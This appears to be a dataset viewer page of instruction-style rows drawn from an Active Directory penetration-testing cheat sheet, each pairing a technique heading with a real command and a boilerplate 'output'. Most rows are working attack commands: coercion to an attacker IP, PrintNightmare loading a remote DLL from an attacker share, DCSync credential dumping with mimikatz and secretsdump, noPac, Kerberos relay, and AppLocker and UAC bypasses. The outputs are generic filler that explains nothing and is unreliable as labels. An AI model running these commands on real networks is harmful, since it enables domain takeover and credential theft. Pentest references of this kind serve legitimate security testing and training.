instruction stringclasses 270
values | input stringlengths 3 214 | output stringclasses 297
values |
|---|---|---|
Classic Enumeration (users, shares, ACL, delegation, ...) | Bloodhound CE | Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'. |
Classic Enumeration (users, shares, ACL, delegation, ...) | bloodhound-python -d <domain> -u <user> -p <password> -gc <dc> -c all | Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'. |
Classic Enumeration (users, shares, ACL, delegation, ...) | rusthound-ce -d <domain_to_enum> -u '<user>@<domain>' -p '<password>' -o <outfile.zip> -z --ldap-filter=(objectGuid=*) | Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'. |
Classic Enumeration (users, shares, ACL, delegation, ...) | sharphound.exe -c all -d <domain> | Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'. |
Classic Enumeration (users, shares, ACL, delegation, ...) | SOAPHound.exe -c c:\temp\cache.txt --bhdump -o c:\temp\bloodhound-output --autosplit --threshold 900 | Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'. |
Classic Enumeration (users, shares, ACL, delegation, ...) | Enumerate Ldap | Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'. |
Classic Enumeration (users, shares, ACL, delegation, ...) | ldeep ldap -u <users> -p '<password>' -d <domain> -s ldap://<dc_ip> all <backup_folder> | Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'. |
Classic Enumeration (users, shares, ACL, delegation, ...) | ldapdomaindump.py -u <user> -p <password> -o <dump_folder> ldap://<dc_ip>:389 | Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'. |
Classic Enumeration (users, shares, ACL, delegation, ...) | ldapsearch-ad.py -l <dc_ip> -d <domain> -u <user> -p '<password>' -o <output.log> -t all | Tool or command referenced under 'Classic Enumeration (users, shares, ACL, delegation, ...)'. |
Classic Enumeration (users, shares, ACL, delegation, ...) | Enumerate DNS | Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'. |
Classic Enumeration (users, shares, ACL, delegation, ...) | adidnsdump -u <domain>\\<user> -p "<password>" --print-zones <dc_ip> #New targets (low hanging fruit) | Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'. |
Enumerate ADCS | certify.exe find | Note or procedural step under 'Enumerate ADCS'. |
Enumerate ADCS | certipy find -u <user>@<domain> -p '<password>' -dc-ip <dc_ip> | Note or procedural step under 'Enumerate ADCS'. |
Enumerate SCCM | sccmhunter.py find -u <user> -p <password> -d <domain> -dc-ip <dc_ip> -debug | Note or procedural step under 'Enumerate SCCM'. |
Enumerate SCCM | ldeep ldap -u <user> -p <password> -d <domain> -s ldap://<dc_ip> sccm | Note or procedural step under 'Enumerate SCCM'. |
Enumerate SCCM | SharpSCCM.exe local site-info | Note or procedural step under 'Enumerate SCCM'. |
Scan Auto | from BH result | Note or procedural step under 'Scan Auto'. |
Scan Auto | AD-miner -c -cf Report -u <neo4j_username> -p <neo4j_password> | Note or procedural step under 'Scan Auto'. |
Scan Auto | PingCastle.exe --healthcheck --server <domain> | Note or procedural step under 'Scan Auto'. |
Scan Auto | Import-Module .\adPEAS.ps1; Invoke-adPEAS -Domain '<domain>' -Server '<dc_fqdn>' | Note or procedural step under 'Scan Auto'. |
Kerberoasting | MATCH (u:User) WHERE u.hasspn=true AND u.enabled = true AND NOT u.objectid ENDS WITH '-502' AND NOT COALESCE(u.gmsa, false) = true AND NOT COALESCE(u.msa, false) = true RETURN u | Note or procedural step under 'Kerberoasting'. |
Kerberoasting | GetUserSPNs.py -request -dc-ip <dc_ip> <domain>/<user>:<password> | Tool or command referenced under 'Kerberoasting'. |
Kerberoasting | Rubeus.exe kerberoast | Tool or command referenced under 'Kerberoasting'. |
Coerce | Drop file | Note or procedural step under 'Coerce'. |
Coerce | .lnk | Note or procedural step under 'Coerce'. |
Coerce | nxc smb <dc_ip> -u '<user>' -p '<password>' -M slinky -o NAME=<filename> SERVER=<attacker_ip> | NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
Coerce | .scf | Note or procedural step under 'Coerce'. |
Coerce | nxc smb <dc_ip> -u '<user>' -p '<password>' -M sucffy -o NAME=<filename> SERVER=<attacker_ip> | NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
Coerce | .url | Note or procedural step under 'Coerce'. |
Coerce | [InternetShortcut]... IconFile=\\<attacker_ip>\%USERNAME%.icon | Note or procedural step under 'Coerce'. |
Coerce | Other files | Note or procedural step under 'Coerce'. |
Coerce | ntlm_theft.py -g all -s <your_ip> -f test | Note or procedural step under 'Coerce'. |
Coerce | Webdav | Note or procedural step under 'Coerce'. |
Coerce | Enable webclient | Note or procedural step under 'Coerce'. |
Coerce | .searchConnector-ms | Note or procedural step under 'Coerce'. |
Coerce | nxc smb <dc_ip> -u '<user>' -p '<password>' -M drop-sc | NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
Coerce | add attack computer in dns | Note or procedural step under 'Coerce'. |
Coerce | dnstool.py -u <domain>\<user> -p <pass> --record <attack_name> --action add --data <ip_attacker> <dc_ip> | Note or procedural step under 'Coerce'. |
Coerce | Launch coerce with <attacker_hostname>@80/x as target | Note or procedural step under 'Coerce'. |
Coerce | RPC call | Note or procedural step under 'Coerce'. |
Coerce | printerbug.py <domain>/<username>:<password>@<printer_ip> <listener_ip> | Note or procedural step under 'Coerce'. |
Coerce | petitpotam.py -d <domain> -u <user> -p <password> <listnerer_ip> <target_ip> | Note or procedural step under 'Coerce'. |
Coerce | coercer.py -d <domain> -u <user> -p <password> -t <target> -l <attacker_ip> | Note or procedural step under 'Coerce'. |
Coerce | Coerce kerberos | Note or procedural step under 'Coerce'. |
Coerce | dnstool.py -u "<domain>\<user>" -p '<password>' -d "<attacker_ip>" --action add "<dns_server_ip>" -r "<servername>1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA" --tcp | Note or procedural step under 'Coerce'. |
Coerce | petitpotam.py -u '<user>' -p '<password>' -d <domain> '<servername>1UWh...' <target> | Note or procedural step under 'Coerce'. |
Intra ID Connect | Find MSOL | Note or procedural step under 'Intra ID Connect'. |
Intra ID Connect | nxc ldap <dc_ip> -u '<user>' -p '<password>' -M get-desc-users |grep -i MSOL | NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
Can Connect to a computer | Lateral move | Note or procedural step under 'Can Connect to a computer'. |
Exploit | know vulnerabilities | Note or procedural step under 'Exploit'. |
Bypass Applocker | Get-Applocker infos | Note or procedural step under 'Bypass Applocker'. |
Bypass Applocker | Get-ChildItem -Path HKLM:\SOFTWARE\Policies \Microsoft\Windows\SrpV2\Exe (dll/msi/...) | Note or procedural step under 'Bypass Applocker'. |
Bypass Applocker | files in writables paths | Note or procedural step under 'Bypass Applocker'. |
Bypass Applocker | C:\Windows\Temp | Note or procedural step under 'Bypass Applocker'. |
Bypass Applocker | C:\Windows\Tasks | Note or procedural step under 'Bypass Applocker'. |
Bypass Applocker | installutil.exe /logfile= /LogToConsole=false /U C:\runme.exe | Note or procedural step under 'Bypass Applocker'. |
Bypass Applocker | mshta.exe my.hta | Note or procedural step under 'Bypass Applocker'. |
Bypass Applocker | MsBuild.exe pshell.xml | Note or procedural step under 'Bypass Applocker'. |
UAC bypass | Fodhelper.exe | Note or procedural step under 'UAC bypass'. |
UAC bypass | wsreset.exe | Note or procedural step under 'UAC bypass'. |
UAC bypass | msdt.exe | Note or procedural step under 'UAC bypass'. |
Auto Enum | winPEASany_ofs.exe | Note or procedural step under 'Auto Enum'. |
Auto Enum | .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended" | Note or procedural step under 'Auto Enum'. |
Search files | findstr /si 'pass' *.txt *.xml *.docx *.ini | Note or procedural step under 'Search files'. |
Exploit | SMBGhost CVE-2020-0796 | Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance. |
Exploit | CVE-2021-36934 (HiveNightmare/SeriousSAM) | Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance. |
Exploit | vssadmin list shadows | Note or procedural step under 'Exploit'. |
Webdav | open file <file>.searchConnector-ms | Note or procedural step under 'Webdav'. |
Webdav | dnstool.py -u <domain>\<user> -p <pass> --record 'attacker' --action add --data <ip_attacker> <dc_ip> | Note or procedural step under 'Webdav'. |
Webdav | petitpotam.py -u '<user>' -p <pass> -d '<domain>' "attacker@80/random.txt" <ip> | Note or procedural step under 'Webdav'. |
Kerberos Relay | KrbRelayUp.exe relay -Domain <domain> -CreateNewComputerAccount -ComputerName <computer$> -ComputerPassword <password> | Note or procedural step under 'Kerberos Relay'. |
Kerberos Relay | KrbRelayUp.exe spawn -m rbcd -d <domain> -dc <dc> -cn <computer_name>-cp <omputer_pass> | Note or procedural step under 'Kerberos Relay'. |
From Service account (SEImpersonate) | RoguePatato | Note or procedural step under 'From Service account (SEImpersonate)'. |
From Service account (SEImpersonate) | GodPotato | Note or procedural step under 'From Service account (SEImpersonate)'. |
From Service account (SEImpersonate) | PrintSpoofer | Note or procedural step under 'From Service account (SEImpersonate)'. |
From Service account (SEImpersonate) | RemotePotato0 | Note or procedural step under 'From Service account (SEImpersonate)'. |
MS14-068 | findSMB2UPTime.py <ip> | Note or procedural step under 'MS14-068'. |
MS14-068 | ms14-068.py -u <user>@<domain> -p <password> -s <user_sid> -d <dc_fqdn> | Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance. |
MS14-068 | msf> use auxiliary/admin/kerberos/ms14_068_kerberos_checksum | Tool or command referenced under 'MS14-068'. |
MS14-068 | goldenPac.py -dc-ip <dc_ip> <domain>/<user>:<password>@target | Note or procedural step under 'MS14-068'. |
GPP MS14-025 | msf> use auxiliary/scanner/smb/smb_enum_gpp | Tool or command referenced under 'GPP MS14-025'. |
GPP MS14-025 | findstr /S /I cpassword \\<domain_fqdn>\sysvol\<domain_fqdn>\policies\*.xml | Note or procedural step under 'GPP MS14-025'. |
GPP MS14-025 | Get-GPPPassword.py <domain>/<user>:<password>@<dc_fqdn> | Note or procedural step under 'GPP MS14-025'. |
PrivExchange (CVE-2019-0724, CVE-2019-0686) | privexchange.py -ah <attacker_ip> <exchange_host> -u <user> -d <domain> -p <password> | Note or procedural step under 'PrivExchange (CVE-2019-0724, CVE-2019-0686)'. |
noPac (CVE-2021-42287, CVE-2021-42278) | nxc smb <ip> -u 'user' -p 'pass' -M nopac #scan | NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
noPac (CVE-2021-42287, CVE-2021-42278) | noPac.exe -domain <domain> -user <user> -pass <password> /dc <dc_fqdn> /mAccount <machine_account> /mPassword <machine_password> /service cifs /ptt | Note or procedural step under 'noPac (CVE-2021-42287, CVE-2021-42278)'. |
PrintNightmare (CVE-2021-1675, CVE-2021-34527) | nxc smb <ip> -u 'user' -p 'pass' -M printnightmare #scan | NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
PrintNightmare (CVE-2021-1675, CVE-2021-34527) | printnightmare.py -dll '\\<attacker_ip>\smb\add_user.dll' '<user>:<password>@<ip> | Note or procedural step under 'PrintNightmare (CVE-2021-1675, CVE-2021-34527)'. |
Certifried (CVE-2022-26923) | Create account | Note or procedural step under 'Certifried (CVE-2022-26923)'. |
Certifried (CVE-2022-26923) | certipy account create -u <user>@<domain> -p '<password>' -user 'certifriedpc' -pass 'certifriedpass' -dns '<fqdn_dc>' | Note or procedural step under 'Certifried (CVE-2022-26923)'. |
Certifried (CVE-2022-26923) | Request | Note or procedural step under 'Certifried (CVE-2022-26923)'. |
Certifried (CVE-2022-26923) | certipy req -u 'certifriedpc$'@<domain> -p 'certifriedpass' -target <ca_fqdn> -ca <ca_name> -template Machine | Note or procedural step under 'Certifried (CVE-2022-26923)'. |
Certifried (CVE-2022-26923) | Authentication | Note or procedural step under 'Certifried (CVE-2022-26923)'. |
Certifried (CVE-2022-26923) | certipy auth -pfx <pfx_file> -username '<dc>$' -domain <domain> -dc-ip <dc_ip> | Note or procedural step under 'Certifried (CVE-2022-26923)'. |
ProxyNotShell (CVE-2022-41040, CVE-2022-41082) | poc_aug3.py <host> <username> <password> <command> | Note or procedural step under 'ProxyNotShell (CVE-2022-41040, CVE-2022-41082)'. |
ProxyNotShell (CVE-2022-41040, CVE-2022-41082) | ACLs/ACEs permissions | Note or procedural step under 'ProxyNotShell (CVE-2022-41040, CVE-2022-41082)'. |
Dcsync | Administrators, Domain Admins, or Enterprise Admins as well as Domain Controller computer accounts | Note or procedural step under 'Dcsync'. |
Dcsync | mimikatz lsadump::dcsync /domain:<target_domain> /user:<target_domain>\administrator | Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
Dcsync | secretsdump.py '<domain>'/'<user>':'<password>'@'<domain_controller>' | Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
Can change msDS-KeyCredentialLInk (Generic Write) + ADCS | Shadow Credentials | Note or procedural step under 'Can change msDS-KeyCredentialLInk (Generic Write) + ADCS'. |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.